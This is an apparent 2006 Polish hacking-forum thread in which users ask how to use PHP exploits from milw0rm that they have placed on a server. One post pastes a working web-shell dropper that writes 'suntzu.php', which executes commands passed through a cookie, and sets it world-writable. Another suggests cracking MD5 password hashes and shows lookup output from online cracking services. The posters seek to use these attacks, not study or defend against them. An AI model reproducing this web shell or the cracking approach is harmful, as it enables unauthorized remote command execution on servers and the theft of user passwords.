Originally posted by Lama2006
a moze dokladniej podasz linka ?
Originally posted by Lama2006
przepraszam juz znalazlem mam te plik na serwie ale jak uzyc tych exploitow przypominam mam juz te pliki php na serwie w obsludze php
http://www.milw0rm.com/exploits/1796
i
http://www.milw0rm.com/exploits/1760
DZIEKUJE ZA ODPOWIEDZ
Originally posted by dool
Ja też znalazłem na tej stronie exploita wykorzystującego dziurę podzczas wstawiania avatarów. Jednak nie za bardzo łapię angielski. Mógłby mi ktoś to szybko streśćić???
Z góry wielki dzięki.
<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo 56789;passthru($_COOKIE[cmd]);echo 56789;?>");
fclose($fp);
chmod("suntzu.php",777);
?>
No nie wiem, ostatnio zauwazylem ze program stal sie troche mocno nieaktualny.Originally posted by _MaVeR_
zlam md5 programem maSs'a najlepiej =] (tylko 2 dni czekania xD)
Rozpoczęto o : 12:25:13 - 24-06-2006
Hash : 212a4c389db4ecfacf61817a711cf892
Liczba serwisów : 7/7
-----------------------------
Serwis : passcracking.ru [~15.5 mln]
Status : Brak hasha w bazie, dodano do kolejki...
-------------
Serwis : md5.altervista.org [~5.1 mln]
Status : Nie udało się odkodować hasha :-(
-------------
Serwis : shm.hard-core.pl [~3.0 mln]
Status : Nie udało się odkodować hasha :-(
-------------
Serwis : securitystats.com [~10.0 tyś]
Status : Nie udało się odkodować hasha :-(
-------------
Serwis : passcrack.spb.ru [~7.9 mln]
-------------
Serwis : milw0rm.com [~10.0 tyś]
Status : Błąd komunikacji z serwisem !!!
-------------
Serwis : gdataonline.com [~73,6 mln]
Status :
-------------
Zakończono o : 12:25:57 - 24-06-2006
-----------------------------